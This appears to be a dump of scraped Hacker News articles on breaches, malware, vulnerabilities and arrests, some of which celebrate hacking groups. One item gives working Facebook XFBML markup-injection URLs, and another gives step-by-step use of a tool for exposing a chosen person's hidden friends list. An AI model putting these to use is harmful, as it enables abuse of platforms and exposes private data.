by the hackers. At the end of year 2011 we decided to give ""The Hacker News Awards 2011"". The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News. Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeak's, such as, Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are now experiencing a flood of what is called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony's system: ""LulzSec was here you sexy bastards! Stupid Sony, so very stupid."" The Hacker News Awards Categories & Winners 1.) Person of the Year : Julian Paul Assange He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the ""Age of WikiLeaks"". Assange described himself in a private conversation as ""the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest"". Wikileaks celebrate its 5th Birthday on 4th October 2011, for being only 5 years old they have done a remarkable and outstanding job of serving the people. The one thing most governments in the world have left off their agenda's. Keep up the good work Wikileaks and we stand in support and behind you. 2.) Best Hacking Group of the Year 2011 : ANONYMOUS DECK THE HALLS AND BATTON DOWN THE SECURITY SYSTEMS…..THEY AIN'T GOIN AWAY! Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here. 3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER CHARLIE SHOWS TUNA ISN'T THE ONLY THING TO PROFIT FROM! Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a security hole in an iPhone's or iPad's security. Charlie Miller gets a kick of out defeating Apple's security mechanisms, using his hacking skills to break into Macbooks and iPhones. 4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATEL COMPUTERS! NOT!!!!! HBGary Federal who was helping the federal government track down cyber activists was itself hacked by the very same activists! Gotta love these guys. Through an elegant but by the numbers social engineering effort those fun fellas at Anonymous, hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turn-over in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They posted 50,000 emails of Aaron Barr from the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund's email. 5.) Best Defacement of the Year 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!! Turkguvenligi also known by the name ""TG Hacker' hacked some very high profile sites using DNS Hijacking. Sites included, Theregister.co.uk , Vodafone, Telegraph, Acer, National Geographic. He diverted visitors to a page declaring it was ""World Hackers Day"". TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008. 6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked) BEWARE OF TIGER'S IN MOTION…….COMING TO YOUR WEBSITE SOON! InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web Pages defaced . He is also the one responsible for the attack carried out on Google Bangladesh. In our humble opinion, this is the craziest hack of the year. 7.) Malware of Year 2011 : DuQu ALAH CAN'T HELP IRAN…….NOT WITH DuQu ON THE LOOSE! This year was really hot on malware discovery and analysis. DuQu became the first known network modular rootkit. DuQu has flexibility for hackers to help remove and add new features quickly and without special effort. Some experts have doubts on relation between the Stuxnet and DuQu creators as they both aim for stealing and collecting data related to Iranian agencies activities. 8.) Best Hacking Tool of the Year 2011 - ANTI (Android Network Toolkit) HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT! ANTI is the smallest but most powerful hacking tool developed by the company Zimperium. Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features : OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, Password Cracker and DoS attack and plugins. 9.) High Profile Hacker of the Year 2011 : LULZSEC LULZSEC KEEPS US LAUGHING ALL THROUGH 2011! Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group's first recorded attack was against Fox.com's website. LulzSec does not appear to hack for financial profit. The group's claimed main motivation is to have fun by causing mayhem. They do things ""for the lulz"" and focus on the possible comedic and entertainment value of attacking targets. 10.) Biggest Victim of the Year 2011 : SONY SONY SHINES AS THE BIGGEST VICTIM OF ALL! Sony gets the Most Epic fail award so we want to give the Best Victim of the year award to Sony. Almost all Sony's websites including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network were Hacked. Defacement of various domains of Sony and Personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards were exposed. Sony expects the hack of the PlayStation Network and cost at ¥14 billion (US$170 million) . 11.) Most Spamy Social Network : FACEBOOK FACEBOOK OUTTA FACE IT……..IT'S A RIPE TARGET FOR 2012 Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the 'Web 2.0' presents new dangers. The wave of pornographic and violent images, Spam messages, Virus and various Worms that flooded Facebook over the past year, make it the Most Spamy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds. 12.) Most Vulnerable Mobile OS of Year 2011 : ANDROIDS MALWARE GETS A FREE RIDE ON MOBILE DEVICES! Mobile devices are seeing a record number of Malware attacks, with Androids leading the way as the mobile operating systems are the most likely to be targeted. Android's vulnerability to malicious content including third-party apps, SMS Trojan viruses and unexpected bugs distributed through free Wi-Fi connections has risen by 45% in 2011. This year we have seen record-breaking numbers of Malware, especially on mobile devices, where the uptake is in direct correlation to popularity. 13.) Best Hacking Book of the Year: BACKTRACK 5 WIRELESS PENETRATION TESTING ATTENTION CLASS, VIVEK RAMACHANDRAN HAS ENTERED THE ROOM! Vivek Ramachandran is a world renowned security researcher and evangelist, who is well known for his discovery of the Wireless Caffe Latte attack, and author of the most amazing book ""BackTrack 5 Wireless Penetration Testing. This book is written completely from a practical perspective. The book wastes no time in delving into a hands-on session with wireless networking. All the way through there are lots of screengrabs, so you can see what should be happening on your screen. 14.) Most Innovative Hack : DIGITAL CERTIFICATES SPOOFING BY COMODO HACKER COMODOHACKER BRINGS OUT THE DRAGON IN CYBER SECURITY CONCERNS The name ""Comodohacker"" gets the most Innovative Hacker award from THN for the breach of the Internet's trust system arising from an outmoded method for assuring that a Web site is authentic. A breach that let a hacker spoof digital certificates for Google.com, Yahoo.com, and other Web sites is prompting browser makers to rethink security. A 21-year-old Iranian patriot took credit saying he was protesting US policy and retaliating against the US for its alleged involvement with last year's Stuxnet, which experts say was designed to target Iran's nuclear program. 15.) Biggest hack of the Year 2011 : SONY PLAYSTATION SONY, SONY, WE PLAY YOUR LEAKS ON OUR OWN STATIONS! The PlayStation Network is an online multiplayer gaming and digital media delivery service owned and run by Sony Computer Entertainment .On April 26, 2011 Sony Playstation announced its network and Qriocity had both been compromised by hackers between April 17 and April 19 allowing access to 70 million user accounts. Get full coverage on this News. ""TRUTH IS THE MOST POWERFUL WEAPON AGAINST INJUSTICE"" For additional information, please contact us at: thehackernews@gmail.com ",Vulnerability Microsoft remotely deleted Tor-based 'Sefnit Botnet' from more than 2 Million Systems,https://thehackernews.com/2014/01/microsoft-remotely-deleted-tor-browser.html,"In October 2013, Microsoft adopted a silent, offensive method to tackle infection due to a Tor-based botnet malware called 'Sefnit'. In an effort to takedown of the Sefnit botnet to protect windows users, Microsoft remotely removes the older versions of installed Tor Browser software and infection from 2 Million systems, even without the knowledge of the system's owner. Last year in August, after Snowden revelations about the National Security Agency's (NSA) Spying programs, the Internet users were under fear of being spied. During the same time Tor Project leaders noticed almost 600% increase in the number of users over the anonymizing networks of Tor i.e. More than 600,000 users join Tor within few weeks. In September, researchers identified the major reason of increased Tor users i.e. A Tor-based botnet called 'Sefnit malware', which was infecting millions of computers for click fraud and bitcoin mining. To achieve the maximum number of infections, cyber criminals were using several ways to spread their botnet. On later investigation, Microsoft discovered some popular softwares like Browser Protector and FileScout, bundled with vulnerable version of Tor Browser & Sefnit components. 'The security problem lies in the fact that during a Sefnit component infection, the Tor client service is also silently installed in the background. Even after Sefnit is removed, unless specific care is taken, the Tor service will be left and still regularly connect to the Tor Network.' It was not practically possible for Microsoft or the Government to instruct each individual on 'How to remove this Malware', so finally Microsoft took the decision of remotely washing out the infections themselves. To clean infected machines, Microsoft began updating definitions for its antimalware apps. ""We modified our signatures to remove the Sefnit-added Tor client service. Signature and remediation are included in all Microsoft security software, including Microsoft Security Essentials, Windows Defender on Windows 8, Microsoft Safety Scanner, Microsoft System Center Endpoint Protection, and Windows Defender Offline."" and later also in Malicious Software Removal Tool. But why Tor Browser? ""Even after Sefnit is removed, unless specific care is taken, the Tor service will be left and still regularly connect to the Tor Network. This is a problem not only for the workload it applies to the Tor Network, but also for the security of these computers."" Microsoft says. So they removed it and to Justify their action, Microsoft points out several vulnerabilities in the Tor version bundled with Sefnit malware i.e. Tor version 0.2.3.25, that opens the user to attack through these known vulnerabilities. ""Tor is a good application used to anonymous traffic and usually poses no threat. Unfortunately, the version installed by Sefnit is v0.2.3.25 – and does not self-update. The latest Tor release builds at the time of writing is v0.2.4.20."" May be this is the right way to neutralize the infections, but the Microsoft's action also clarifies the capability to remotely remove any software from your computer. Nicholas J. Hopper from University of Minnesota, provided a detailed explanation about 'Protecting Tor from botnet abuse in the long term' in a paper. ",Vulnerability Hacking Virtual Reality – Researchers Exploit Popular Bigscreen VR App,https://thehackernews.com/2019/02/bigscreen-vr-hacking.html,"A team of cybersecurity researchers from the University of New Haven yesterday released a video demonstrating how vulnerabilities that most programmers often underestimate could have allowed hackers to evade privacy and security of your virtual reality experience as well as the real world. According to the researchers—Ibrahim Baggili, Peter Casey and Martin Vondráček—the underlying vulnerabilities, technical details of which are not yet publicly available but shared exclusively with The Hacker News, resided in a popular virtual reality (VR) application called Bigscreen and the Unity game development platform, on which Bigscreen is built. Bigscreen is a popular VR application that describes itself as a ""virtual living room,"" enabling friends to hang out together in virtual world, watch movies in a virtual cinema, chat in the lobby, make private rooms, collaborate on projects together, share their computer screens or control in a virtual environment and more. Scary Things Hackers Can Do to Your VR Experience As shown in the video, the flaws in Bigscreen app literally allowed researchers to remotely hijack Bigscreen's web infrastructure (that runs behind its desktop application) and perform multiple attack scenarios through a custom-designed command-and-control server, including: discover private rooms, join any VR room, including private rooms, eavesdrop on users while remaining invisible in any VR room, view VR users' computer screens in real-time, stealthily receive victim's screen sharing, audio, and microphone audio, send messages on the user's behalf, remove/ban users from a room setup a self-replicating worm that could spread across the Bigscreen community, and many more. What's even more Worrisome? Besides this, a different vulnerability in the Unity Engine Scripting API that researchers exploited in combination with the Bigscreen flaw, allowed them to even take complete control over VR users' computers by secretly downloading and installing malware or running malicious commands without requiring any further interaction. Bigscreen VR App and Unity Engine Vulnerabilities According to the in-depth technical details shared with The Hacker News, multiple Bigscreen flaws in question are persistent/stored cross-site scripting (XSS) issues that reside in the input fields where VR users are supposed to submit their username, room name, room description, room category in the Bigscreen app. Since the vulnerable input boxes were not sanitized, attackers could have leveraged the flaw to inject and execute malicious JavaScript code on the application installed by other users connecting to the Bigscreen lobby and VR rooms. ""The payload script will be executed upon the browser-based player entering a room affecting all members of the room. This attack vector allows for the modification/invocation of any variable/function within the scope of the Window,"" researchers told The Hacker News. ""In summary, the ability to execute JavaScript on the victim's machine allows for many other attacks such as phishing pop-ups, forged messages, and forced desktop sharing."" ""We observed a lack of authentication when handling private room joining and communications with the Bigscreen signaling server. As a result, several potential vulnerabilities arise, to include denial of service, manipulation of public rooms, brute force attacks, and server resource exhaustion."" As demonstrated by the team, attackers can also inject malicious JavaScript payloads to leverage an undocumented and potentially dangerous Unity Scripting API to secretly download malware from the Internet and execute it on a targeted system or for all users. ""The function Unity.openLink() was found to launch web links in the default 6 browsers. An XSS attack containing an HTTP, FTP, or SMB link could cause arbitrary files to be fetched and downloaded,"" researchers told The Hacker News. ""We expect that most of the applications using affected Unity API may be vulnerable."" The team discovered the vulnerabilities while testing the security of VR systems through its National Science Foundation-funded project. Man-in-the-Room (MITR) Attack As dubbed by the researchers, Man-in-the-Room is one of the attack scenarios where a hacker secretly joins a VR room while remaining invisible to other users in the same room. ""They can't see you, they can't hear you, but the hacker can hear and see them, like an invisible Peeping Tom. A different layer of privacy has been invaded,"" Ibrahim Baggili, founder and co-director of the Cyber Forensics Research and Education Group, said. The team found that Bigscreen application uses Dynamically Loaded Libraries (DLLs) without integrity checking that allowed the researchers to modify the source code of selected libraries and change its behavior, letting them hide their presence from UI using XSS payloads. ""Our proof-of-concept WebRTC application was able to connect to legitimate Bigscreen application. This lead to complete control over one end of audio/video/microphone/data streams. Our application was invisible in the VR room because it did not send any data to other peers,"" the researchers said. The team responsibly reported their findings to both Bigscreen and Unity. Bigscreen acknowledged the security vulnerabilities in its ""servers and streaming systems"" and released the new Bigscreen Beta ""2019 Update"" that fully patched the issues. Moreover, Unity acknowledged the vulnerabilities by merely adding a note to its documentation stating that its platform ""can be used to open more than just web pages, so it has important security implication you must be aware of."" ",Vulnerability Passwordstate Password Manager Update Hijacked to Install Backdoor on Thousands of PCs,https://thehackernews.com/2021/04/passwordstate-password-manager-update.html,"Click Studios, the Australian software company behind the Passwordstate password management application, has notified customers to reset their passwords following a supply chain attack. The Adelaide-based firm said a bad actor used sophisticated techniques to compromise the software's update mechanism and used it to drop malware on user computers. The breach is said to have occurred between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC, for a total period of about 28 hours. ""Only customers that performed In-Place Upgrades between the times stated above are believed to be affected,"" the company said in an advisory. ""Manual Upgrades of Passwordstate are not compromised. Affected customers password records may have been harvested."" The development was first reported by the Polish tech news site Niebezpiecznik. It's not immediately clear who the attackers are or how they compromised the password manager's update feature. Click Studios said an investigation into the incident is ongoing but noted ""the number of affected customers appears to be very low."" Passwordstate is an on-premise web-based solution used for enterprise password management, enabling businesses to securely store passwords, integrate the solution into their applications, and reset passwords across a range of systems, among others. The software is used by 29,000 customers and 370,000 security and IT professionals globally, counting several Fortune 500 companies spanning verticals such as banking, insurance, defense, government, education, and manufacturing. According to an initial analysis shared by Denmark-based security firm CSIS Group, the malware-laced update came in the form of a ZIP archive file, ""Passwordstate_upgrade.zip,"" which contained a modified version of a library called ""moserware.secretsplitter.dll"" (VirusTotal submissions here and here). This file, in turn, established contact with a remote server to fetch a second-stage payload (""upgrade_service_upgrade.zip"") that extracted Passwordstate data and exported the information back to the adversary's CDN network. Click Studios said the server was taken down as of April 22 at 7:00 AM UTC. The full list of compromised information includes computer name, user name, domain name, current process name, current process id, names and IDs of all running processes, names of all running services, display name and status, Passwordstate instance's Proxy Server Address, usernames and passwords.. Click Studios has released a hotfix package to help customers remove the attacker's tampered DLL and overwrite it with a legitimate variant. The company is also recommending that businesses reset all credentials associated with external facing systems (firewalls, VPN) as well as internal infrastructure (storage systems, local systems) and any other passwords stored in Passwordstate. Passwordstate's breach comes as supply chain attacks are fast emerging a new threat to companies that depend on third-party software vendors for their day-to-day operations. In December 2020, a rogue update to the SolarWinds Orion network management software installed a backdoor on the networks of up to 18,000 customers. Last week, software auditing startup Codecov alerted customers that it discovered its software had been infected with a backdoor as early as January 31 to gain access to authentication tokens for various internal software accounts used by developers. The incident didn't come to light until April 1. ",Cyber_Attack All Smartwatches are vulnerable to Hackers,https://thehackernews.com/2015/07/smartwatch-hacking.html,"Do you own a Smartwatch? If yes, then how safe it is? There are almost 100 percent chances that you own a vulnerable Smartwatch. Computer manufacturer Hewlett-Packard is warning users of smartwatches including Apple Watch and Samsung Gear that their wearable devices are vulnerable to cyber attacks. In a study, HP's Fortify tested today's top 10 smartwatches for security features, such as basic data encryption, password protection and privacy concerns. The most shocking part of the study was that – Not even a Single Smartwatch Found to be 100 percent Safe Security experts found that 100 percent of wearable devices contained at least one serious security vulnerability that could make the devices vulnerable to hackers. With the increase in the adoption of smartwatches, manufacturers need to pay closer attention to the customers' security because these wearable devices could potentially open doors to new threats to personal and sensitive information. ""As the adoption of Smartwatches accelerates, the platform will become vastly more attractive to those who would abuse that access, making it critical that we take precautions when transmitting personal data or connecting Smartwatches into corporate networks,"" Jason Schmitt, general manager at HP's Security Fortify said in a statement. The study [PDF], no doubt, had included Smart watches by Apple, Pebble, Samsung and Sony, as it claims to have picked top 10 smartwatches. Here's the list of issues reported by HP: 1. Lack of transport encryption – Though all products implemented transport encryption using SSL/TLS, 40 percent of devices found to be either vulnerable to the POODLE attack, allowing the use of weak cyphers, or still using SSL v2. 2. Insecure Interfaces – Three out of ten smartwatches used cloud-based web interfaces and all of them were vulnerable to account harvesting. This allowed unlimited login attempts, helping hackers guess passwords. 3. Insufficient User Authentication/Authorization – Three out of ten smartwatches completely failed to offer Two-Factor authentication, or the ability to lock accounts after 3 to 5 failed password attempts. 4. Insecure Software/Firmware – 7 out of 10 smartwatches had issues with firmware updates. The wearable devices, including smartwatches, often did not receive encrypted firmware updates, but many updates were signed to help prevent malicious firmware updates from being installed. While a lack of encryption did not allow the files to be downloaded and analyzed. 5. Privacy Concerns – Smartwatches also demonstrate a risk to personal security as well as privacy. All the tested devices collected some form of personal information, including username, address, date of birth, gender, heart rate, weight and other health information. The experts said it would not disclose the names of smartphone manufacturers whose watches they had tested, but they are working with vendors to ""build security into their products before they put them out to market."" Meanwhile, HP urges users to not connect their smartwatches to the sensitive access control functions like cars or homes unless strong authorization is offered. ",Vulnerability Facebook Status Update With XFBML Injection,https://thehackernews.com/2011/08/facebook-status-update-with-xfbml.html,"Facebook Status Update With XFBML Injection i Last week Acizninja DeadcOde share Tweaking Facebook Status with HTML button. Well today he is going to share another kind of cool tricks to tweak Facebook Status Update using XFBML Injection. With this tweak, we will do an injection on Facebook URL and then share the results of the injections on our Facebook status .Here's the preview and the url code : LIVE STREAM : https://www.facebook.com/unix.root/posts/217926581593127 [code] https://www.facebook.com/connect/prompt_feed.php?display=touch&api_key=209403259107231&link=https://t.co/q3EzkPR&attachment={%27description%27%3A%27%3Cfb:live-stream%20event_app_id=%22266225821384%22%20width=%22400%22%20height=%22500%22%20xid=%22%22%20via_url=%22https://t.co/q3EzkPR%22%20always_post_to_friends=%22false%22%3E%3C/fb:live-stream%3E+%27} [/code] TEXT AREA : https://www.facebook.com/unix.root/posts/136123736478234 [code] https://www.facebook.com/connect/prompt_feed.php?&api_key=209403259107231&attachment={%27name%27:%27%20%3Ccenter%3E%3Cfb:editor-text%20label=%22Powered%20By%22%20name=%22title%22%20value=%22%20https://thehackernews.com%22/%3E%3C/br%3E%3Ccenter%3E%3C/center%3E%3Cfb:editor-textarea%20label=%22Komentar%20Anda%22%20name=%22comment%22%20value=%22%20JEMPOL%22/%3E%3Cfb:editor-buttonset%3E%3Ccenter%3E%3Cbutton+type%3D%22button%22%3EKomentari%3C/button%3E%3C/center%3E%27} [/code] CAPTCHA : https://www.facebook.com/unix.root/posts/248809308482674 [code] https://www.facebook.com/connect/prompt_feed.php?&attachment={'href'%3A'http%3A%2F%2Fthehackernews.com'%2C'name'%3A'+
Fail + book = Facebook<%2Fbutton><%2Fcenter><%2Fform>kirim+<%2Fbutton>%27} [/code] Happy Tweaking, [Source] and Credit to : Acizninja DeadcOde ",Vulnerability "Interpol Arrests 3 Nigerian BEC Scammers For Targeting Over 500,000 Entities",https://thehackernews.com/2020/11/interpol-arrest-3-nigerian-bec-scammers.html,"Three Nigerian citizens suspected of being members of an organized cybercrime group behind distributing malware, carrying out phishing campaigns, and extensive Business Email Compromise (BEC) scams have been arrested in the city of Lagos, Interpol reported yesterday. The investigation, dubbed ""Operation Falcon,"" was jointly undertaken by the international police organization along with Singapore-based cybersecurity firm Group-IB and the Nigeria Police Force, the principal law enforcement agency in the country. About 50,000 targeted victims of the criminal schemes have been identified so far, as the probe continues to track down other suspected gang members and the monetization methods employed by the group. Group-IB's participation in the year-long operation came as part of Interpol's Project Gateway, which provides a framework for agreements with selected private sector partners and receives threat intel directly. ""The suspects are alleged to have developed phishing links, domains, and mass mailing campaigns in which they impersonated representatives of organizations,"" Interpol said. ""They then used these campaigns to disseminate 26 malware programmes, spyware and remote access tools, including AgentTesla, Loki, Azorult, Spartan and the nanocore and Remcos Remote Access Trojans."" In addition to perpetrating BEC campaigns and sending out emails containing malware-laced email attachments, the attacks have been used to infiltrate and monitor the systems of victim organizations and individuals, leading to the compromise of at least 500,000 government and private sector companies in more than 150 countries since 2017. According to Group-IB, the three individuals — identified only by their initials OC, IO, and OI — are believed to be members of a gang which it has been tracking under the moniker TMT, a prolific cybercrime crew that it says is divided into multiple smaller subgroups based on an analysis of the attackers' infrastructure and techniques. Some of their mass email phishing campaigns took the form of purchasing orders, product inquiries, and even COVID-19 aid impersonating legitimate companies, with the operators leveraging Gammadyne Mailer and Turbo-Mailer to send out phishing emails. The group also relied on MailChimp to track whether a recipient opened the message. The ultimate goal of the attacks, Group-IB noted, was to steal authentication data from browsers, email, and FTP clients from companies located in the US, the UK, Singapore, Japan, Nigeria, among others. ""This group was running a well-established criminal business model,"" Interpol's Cybercrime Director Craig Jones noted. ""From infiltration to cashing in, they used a multitude of tools and techniques to generate maximum profits."" ",Malware Value.net (ISP) hacked by Sec Indi,https://thehackernews.com/2011/05/valuenet-isp-hacked-by-sec-indi.html,"Value.net (ISP) hacked by Sec Indi According to Sec Indi ""value.net ISP has security holes, actually the holes are unknown., no damages or changes done in server"" Hack Proof: ",Vulnerability Free Thanatos Ransomware Decryption Tool Released,https://thehackernews.com/2018/06/free-ransomware-decryption-tools.html,"If your computer has been infected with Thanatos Ransomware and you are searching for a free ransomware decryption tool to unlock or decrypt your files—your search is over here. Security researchers at Cisco Talos have discovered a weakness in the Thanatos ransomware code that makes it possible for victims to unlock their Thanatos encrypted files for free without paying any ransom in cryptocurrencies. Like all ransomware threats, Thanatos encrypts files and asks victims to pay for ransom in multiple cryptocurrencies, including Bitcoin Cash, to decrypt their files. ""Multiple versions of Thanatos have been leveraged by attackers, indicating that this is an evolving threat that continues to be actively developed by threat actors with multiple versions having been distributed in the wild,"" the researchers say. ""Unlike other ransomware commonly being distributed, Thanatos does not demand ransom payments to be made using a single cryptocurrency like bitcoin. Instead, it has been observed supporting ransom payments in the form of Bitcoin Cash (BCH), Zcash (ZEC), Ethereum (ETH) and others."" Once infected, all the encrypted filename extensions on the affected computer are changed to .THANATOS, and then a ransom note pops up whenever the user tries to log on to the system, instructing them to send the ransom money to a hardcoded cryptocurrency wallet address in order to decrypt the files. However, since Thanatos uses different encryption keys to encrypt each file on an infected system without storing them anywhere, it is impossible for malware authors to return users' data, even if the victims pay the ransom. Free Thanatos Ransomware Decryption Tool Cisco researchers analyzed the malware code and found a loophole in the design of the file encryption methodology used by Thanatos, using which they developed a free ransomware decryption tool that will help victims decrypt their files. Dubbed ThanatosDecryptor, the open source, free ransomware decryption tool can be downloaded from the GitHub website, which has recently been acquired by Microsoft for $7.5 billion, and works for Thanatos ransomware versions 1 and 1.1 Since the encryption keys used by Thanatos are derived based upon the number of milliseconds since the system last booted, it was possible for researchers to reverse engineer the logic and re-generate the same 32-bit encryption key using brute force attack and Windows Event Logs. ""Since Thanatos does not modify the file creation dates on encrypted files, the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection,"" researchers explain. ""At an average of 100,000 brute-force attempts per second (which was the baseline in a virtual machine used for testing), it would take roughly 14 minutes to successfully recover the encryption key in these conditions."" For more detail about the Thanatos ransomware, you can head on to detailed blog post published by Cisco Talos today. How to Protect Yourself From Ransomware Attacks Most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs. Whether it's Locky, CoinVault, Thanatos, TeslaCrypt, or any other ransomware malware, the protection measures are standard. To safeguard against such ransomware attacks, you should always be suspicious of uninvited documents sent in an email and never click on links inside those documents unless verifying their sources. Check if macros are disabled in your MS Office apps. If not, block macros from running in MS Office files from the Internet. In order to always have a tight grip on all your important documents, keep a good backup routine in place that makes copies of your files to an external storage device which is not always connected to your PC. Moreover, make sure that you run an active behavioral-based antivirus security suite on your system that can detect and block such malware before it can infect your device, and always remember to keep them up-to-date. ",Malware Free Tool Allows Anyone to View Facebook Users' Hidden Friends List,https://thehackernews.com/2015/05/facebook-friends-mapper.html,"Facebook lets you control your every single information posted on the social media site by giving many options to make them private from others, even from your friends. But… There are some personal information on Facebook that you just cannot completely hide — Your friends list are among those, even if there is an option to hide it. The issue resides in the Facebook's mutual-friends feature concept, which has been in controversies in the past, raising privacy concerns. But now, a new Free Chrome extension called ""Facebook Friends Mapper"" (developed by Alon Kollmann) can expose a lot more than just mutual friends of the two Facebook users in ""just one click,"" creating high security and Privacy risks for Facebook users. Generally, Facebook also allows you to set the visibility of your list of Facebook friends to ""Only Me"" if you want to keep your friends list hidden from other Facebook users as well as your own friends. However, the problem is… ...even if you set your friends list to private, other Facebook users may still be able to see part of your hidden Friends list and that part is a lot more than just your mutual friends. How does Facebook Friends Mapper Chrome extension work? Facebook Friends Mapper extension leverages the Mutual Friends feature of the social networking site to crawl and expose your hidden Facebook Friends list. If, for example, Facebook CEO Mark Zuckerberg does not share his friends list with the public and neither I am on his friend list. However, I have at least one mutual friend with him. Therefore… ...using Facebook Friends Mapper tool I would be able to see most of his hidden Facebook friends by exploiting the 'mutual friend' logical flaw. How to use Facebook Friends Mapper Chrome extension? 1. Install Facebook Friends Mapper extension from Chrome web store. 2. Open Facebook Profile of user you want to target. 3. You will find 'Reveal Friends' option on Friends tab. 4. Click on Reveal Friends and Bang! Just one condition to meet: In case you want to see hidden Facebook Friend list of anyone, you can use Facebook Friends Mapper extension if you fulfill the following conditions: Facebook user, whose friends list you want to target, must have at least one mutual friend with you, and doesn't matter if you are friends with him/her or not. Facebook Friends Mapper Chrome extension launched just a few days ago, so most of the users are yet unaware about this Facebook Hacking Tool. You can Install Facebook Friends Mapper Chrome extension from free from Google Chrome Extension Store. If you are willing to keep your friend list private, then please note that Facebook's current privacy setting would not help you to resolve the issue. So, we expect a privacy patch from Facebook Security team as soon as possible before this tool goes wild. ",Vulnerability Chinese Hackers group 'Comment Crew' is still active and operating under cover,https://thehackernews.com/2013/06/Comment-Crew-Chinese-Hackers.html,"Security experts are confident that the Chinese hackers group known as Comment Crew is still operating under cover. ""The Comment Crew is back again"" this is the rumor within Intelligence community, researchers suspect the involvement of the group of hackers in the recent cyber dispute between U.S. and China. Let's make a step back, last February Mandiant Intelligence firm released an interesting report that revealed an enterprise-scale computer espionage campaign dubbed APT1. Mandiant linked the APT1 attacks, that compromised 141 organizations in seven years, to Chinese military unit called ""61398"". The is very interesting is that the security firm identified a common pattern for the attacks conducted by Chinese hackers group, it was also able to define a series of key indicators for identifying ongoing APT attacks. Mandiant security firm had monitored the group during last years and report details its operations, it wasn't the only one FireEye is another company which is distinguished in this type of investigation. From the analysis of past attacks and the observation of ongoing events the researchers noted that after the intense activities observed early 2013 the group Comment Crew stopped using its infrastructures and to attack the previous targets. The behavior was probably caused by a change of tactics of the group after the revelations of it operations, it's common conviction that The Comment Crew group started new campaigns against new targets using different infrastructures. Senior researcher at FireEye. Alex Lanstein sustains that The Comment Crew is still working undercover after an apparent period of rest: ""They took a little breather, and they started back up,"" he said. ""We didn't see them take control of any of the systems they had previously compromised,"" ""They started fresh with a whole new round of attacks."" Lanstein revealed. The Comment Crew is a group of state-sponsored hackers that operates with a predefined scheme, the security analysts revealed that all the cyber attacks share tools and methods and in many cases from the analysis of the malicious code used it is possible to track the source of the offensives. The researchers used to track malware campaigns analyzing tracks left by hackers including keyboard layouts and the presence of embedded fonts and abuse of bogus DNS (domain name system) registration details. Lanstein highlighted another new detail revealed by the investigation of FireEye, The Comment Crew group left the name of their particular coding project, called ""Moonclient,"" in many instances of the malware detected. FireEye kept this information secret to avoid allow its team to follow the Comment Crew but it seems now it seems they have changed tactics and malware. Lanstein commented on the forgetfulness of hackers with the following words: ""you are dealing with humans on the other side of the keyboard,"" ""This is a mistake made over and over again,"" ""It's more difficult to track them now,"" Lanstein said. FireEye has released today an interesting report titled ""Digital Bread Crumbs: Seven Clues To Identifying Who's Behind Advanced Cyber Attacks "" that explains how to conduct an investigation based on common errors committed by the hackers. The document is based on the analysis of nearly 1,500 campaigns tracked by FireEye, the paper reported the results of the study on the common characteristics of various attack and the way to identify the hackers: Keyboard Layout. Hidden in phishing attempts is information about the attacker's choice of keyboard, which varies by language and region. Malware Metadata. Malware source code contains technical details that suggest the attacker's language, location, and ties to other campaigns. Embedded Fonts. The fonts used in phishing emails point to the origin of the attack. This is true even when the fonts are not normally used in the attacker's 